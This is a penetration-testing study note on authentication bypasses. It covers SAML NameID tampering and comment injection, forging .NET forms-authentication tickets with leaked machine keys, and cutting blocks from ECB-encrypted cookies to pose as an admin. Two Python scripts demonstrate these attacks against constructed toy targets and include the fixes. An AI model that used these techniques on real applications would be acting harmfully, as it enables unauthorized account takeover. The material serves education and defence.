Broken Authentication

SAML Auth Bypass

Workflow

Tamper Username/Email

  • A weak SAML implementation (service provider) that does not validate the signature on the assertion lets an attacker edit the NameID or email attribute in an intercepted SAMLResponse and access the account of another user.

Comment Injection

  • The signature on a SAML assertion is computed over a canonicalized (C14N) form of the XML, so that documents that differ only in serialization details (whitespace, attribute order, namespace prefixes) produce the same digest and therefore the same signature. The signature survives changes that do not alter the document's meaning.

  • The canonicalization variant commonly used omits comments (and normalizes whitespace) while building the digest, so inserting a comment into a signed element does not invalidate the signature.

  • The XML parser on the service-provider side may split the NameID below into three nodes:

    • text: notsosecure

    • comment: <!-- this is a comment -->

    • text: user@webhacklab.com

  • If the parser returns only the last text node, the service provider sees user@webhacklab.com. The attacker registers the account notsosecureuser@webhacklab.com at the IdP, which signs that value; adding the comment keeps the signature valid (comments are dropped during canonicalization) but may log the attacker in as user@webhacklab.com.
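The following is an added example (not part of the original notes) that reproduces both SAML cases above in plain Python with the standard library: a signed NameID, the same value with a comment injected, a toy digest function that mimics only the comment-stripping part of C14N (real C14N also normalizes whitespace, namespaces and attribute order; the SHA-256 stand-in is an assumption, as are the account names), and two service-provider extraction routines: one that takes the last child node and is fooled, and one that concatenates all text nodes and recovers the signed value. A NameID that is simply edited fails the digest check, which is the case from "Tamper Username/Email".

```python
import hashlib
from xml.dom import minidom

# Constructed sample values (not from a real IdP): the attacker owns the
# account "notsosecureuser@webhacklab.com", the victim is "user@webhacklab.com".
SIGNED_NAMEID = "<NameID>notsosecureuser@webhacklab.com</NameID>"
INJECTED_NAMEID = (
    "<NameID>notsosecure<!-- this is a comment -->user@webhacklab.com</NameID>"
)


def _strip_comments(node):
    """Drop comment nodes recursively: the one C14N rule this example needs."""
    for child in list(node.childNodes):
        if child.nodeType == child.COMMENT_NODE:
            node.removeChild(child)
        else:
            _strip_comments(child)
    return node


def digest(xml_text):
    """Toy stand-in for the digest a SAML signature covers: canonicalize
    (here only comment removal) and hash the serialized result."""
    doc = minidom.parseString(xml_text)
    _strip_comments(doc)
    return hashlib.sha256(doc.documentElement.toxml().encode()).hexdigest()


def nameid_last_node(xml_text):
    """Vulnerable extraction: returns the text of the element's last child,
    i.e. only what comes after an injected comment."""
    element = minidom.parseString(xml_text).documentElement
    return element.lastChild.data


def nameid_all_text(xml_text):
    """Correct extraction: concatenates every text node, which restores the
    value the IdP actually signed."""
    element = minidom.parseString(xml_text).documentElement
    return "".join(
        c.data for c in element.childNodes if c.nodeType == c.TEXT_NODE
    )


def login(xml_text, signed_digest, extract):
    """SP-side check: accept the assertion only if the digest still matches
    the signed one, then identify the user with the given extraction."""
    if digest(xml_text) != signed_digest:
        return None  # plain tampering (edited NameID) is caught here
    return extract(xml_text)


if __name__ == "__main__":
    signed = digest(SIGNED_NAMEID)
    print("signature still valid:", digest(INJECTED_NAMEID) == signed)
    print("vulnerable SP logs in:", login(INJECTED_NAMEID, signed, nameid_last_node))
    print("fixed SP logs in:    ", login(INJECTED_NAMEID, signed, nameid_all_text))
```

The fix on the service-provider side is the second extractor: read the full text content of the element (or, better, re-serialize the canonicalized assertion and read the NameID from that) rather than a single child node.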

.NET Machine Key Auth Bypass

  • The machine key (validationKey and decryptionKey) is used to encrypt and decrypt forms-authentication tickets, cookie data and view-state data, to compute their MAC, and to identify out-of-process session state.

  • It is configured in the <machineKey> element of web.config (or machine.config); if it is not set explicitly, ASP.NET auto-generates it per machine.

  • The following are encrypted and/or MAC-protected with the machine key:

    • Authentication tokens

      • Forms authentication ticket (.ASPXAUTH)

      • OWIN / OAuth tokens

      • ASP.NET Identity cookie (.AspNet.ApplicationCookie)

    • WebResource.axd and ScriptResource.axd

    • ViewState (__VIEWSTATE)

    • CSRF (anti-forgery) token

    • Password reset token

    • Role cookie

    • Membership passwords, etc.

Testing for Leaked Machine Keys

  • Look for the target's <machineKey> in exposed web.config copies (backup or .bak files, source-disclosure bugs, public or internal source repositories) and for keys copied from public documentation samples.

  • A candidate key is confirmed when it decrypts a captured .ASPXAUTH cookie or validates a captured __VIEWSTATE; the validation and decryption algorithms in the configuration must match the target's.

Exploitation

  • Enumerate valid usernames and pick a privileged one (for example an administrator).

  • Build a forms-authentication ticket for that username and encrypt it with the leaked keys, for example with FormsAuthentication.Encrypt running under a configuration that carries the target's <machineKey>. The validation algorithm, decryption algorithm and compatibilityMode must match the target's, otherwise the ticket will not decrypt there.

  • Replace the .ASPXAUTH cookie with the forged ticket; the application accepts it as an authenticated session for that user, bypassing the login.

Weak Encryption

Electronic Codebook [ECB]

  • ECB is a block-cipher mode in which the message is split into fixed-size blocks (8 bytes for DES/3DES, 16 bytes for AES) and each block is encrypted independently with the same key, so identical plaintext blocks produce identical ciphertext blocks.

  • Using ECB has several security implications:

    • Blocks of the encrypted message can be removed without disturbing the decryption of the remaining blocks.

    • Blocks of the encrypted message can be moved around or duplicated without disturbing the decryption process.

Vulnerability

  • The application is vulnerable if it relies only on ECB encryption of the cookie for integrity.

    • Encryption provides confidentiality.

    • A signature or MAC provides integrity.

  • ECB mode lets an attacker tamper with the encrypted data (cut, reorder or duplicate blocks) without decrypting it or knowing the key.

Exploitation

  • Assumptions:

    • The web app does not validate the 'password' part of the cookie; only the username field is trusted.

    • The cookie value is not randomized: user X receives the same cookie on every successful login (no IV, nonce or session identifier).

  • URL-decode, then Base64-decode the cookie and inspect the hex. Repeated byte sequences indicate ECB.

  • If so, identify the block size by registering a user (or password) consisting of a long run of the same character, for example 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'. If the hex repeats every 8 bytes, the block size is 8 bytes.

  • Assuming the block size is 8 bytes and the username is the first field of the plaintext: create the user 'aaaaaaaaadmin' (eight 'a's followed by 'admin'), log in and decode the cookie. Delete the first 8 bytes (the block holding 'aaaaaaaa'), Base64- and URL-encode the remainder and replay it. The remaining blocks still decrypt, but the plaintext now starts with 'admin', so the application treats the request as coming from user 'admin'.
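The whole procedure above, as an added example that is not part of the original notes. It uses a small 8-byte Feistel block cipher built from HMAC-SHA256 as a stand-in for DES (so the script runs with the standard library only; it is not a real cipher and exists only to show ECB behaviour), a constructed vulnerable application whose cookie is ECB(user + '|' + password) with no MAC and whose server trusts the decrypted user field without checking the password (the two assumptions above), and an attacker routine that detects the block size from the repeated-block fingerprint and then cuts the first block off a cookie for 'aaaaaaaaadmin'. The key, user names and cookie layout are all constructed for the example.

```python
import base64
import hashlib
import hmac
from urllib.parse import quote, unquote

BLOCK = 8  # DES-sized block, as in the worked example above (constructed)


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, half, rnd):
    # Keyed round function: HMAC-SHA256 truncated to half a block.
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[: BLOCK // 2]


def _enc_block(key, block):
    # 4-round Feistel network: a stand-in block cipher, not DES or AES.
    l, r = block[: BLOCK // 2], block[BLOCK // 2 :]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, r, rnd))
    return l + r


def _dec_block(key, block):
    l, r = block[: BLOCK // 2], block[BLOCK // 2 :]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, l, rnd)), l
    return l + r


def ecb_encrypt(key, plaintext):
    # PKCS#7 padding, then every block is encrypted independently (ECB).
    n = BLOCK - len(plaintext) % BLOCK
    padded = plaintext + bytes([n]) * n
    return b"".join(_enc_block(key, padded[i:i + BLOCK]) for i in range(0, len(padded), BLOCK))


def ecb_decrypt(key, ciphertext):
    padded = b"".join(_dec_block(key, ciphertext[i:i + BLOCK]) for i in range(0, len(ciphertext), BLOCK))
    return padded[: -padded[-1]]


class VulnerableApp:
    """Constructed target: cookie = URL-encoded Base64 of ECB(user|password),
    no MAC; whoami() trusts the user field and never re-checks the password."""

    def __init__(self):
        self.key = b"server-side-secret-key"  # constructed; never leaves the server
        self.users = {"admin": "correct horse battery staple"}

    def register(self, user, password):
        self.users[user] = password

    def login(self, user, password):
        if self.users.get(user) != password:
            raise PermissionError("bad credentials")
        raw = ecb_encrypt(self.key, f"{user}|{password}".encode())
        return quote(base64.b64encode(raw).decode())

    def whoami(self, cookie):
        raw = base64.b64decode(unquote(cookie))
        user, _, _password = ecb_decrypt(self.key, raw).decode().partition("|")
        return user if user in self.users else None


def cookie_bytes(cookie):
    """URL-decode, then Base64-decode, as in the testing step."""
    return base64.b64decode(unquote(cookie))


def find_block_size(ciphertext):
    """Smallest chunk size at which two consecutive chunks are identical: the
    repeated-block fingerprint ECB leaves on a run of identical characters."""
    for size in range(4, 65):
        chunks = [ciphertext[i:i + size] for i in range(0, len(ciphertext) - size + 1, size)]
        if any(a == b for a, b in zip(chunks, chunks[1:])):
            return size
    return None


def forge_admin_cookie(app):
    # Step 1: block size from the cookie of a user made of a long run of 'a'.
    app.register("a" * 40, "x")
    bs = find_block_size(cookie_bytes(app.login("a" * 40, "x")))
    # Step 2: register 'a' * bs + 'admin' so "admin|..." starts on a block boundary.
    app.register("a" * bs + "admin", "x")
    raw = cookie_bytes(app.login("a" * bs + "admin", "x"))
    # Step 3: drop the first block; the rest decrypts unchanged, now beginning with "admin".
    return bs, quote(base64.b64encode(raw[bs:]).decode())


if __name__ == "__main__":
    app = VulnerableApp()
    bs, forged = forge_admin_cookie(app)
    print("block size:", bs, "| forged cookie identifies as:", app.whoami(forged))
```

The defence is orthogonal to the mode: authenticate the cookie (an HMAC over the ciphertext, or an AEAD mode such as AES-GCM) and reject anything whose tag does not verify before decrypting, then cutting or reordering blocks is detected rather than silently accepted.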
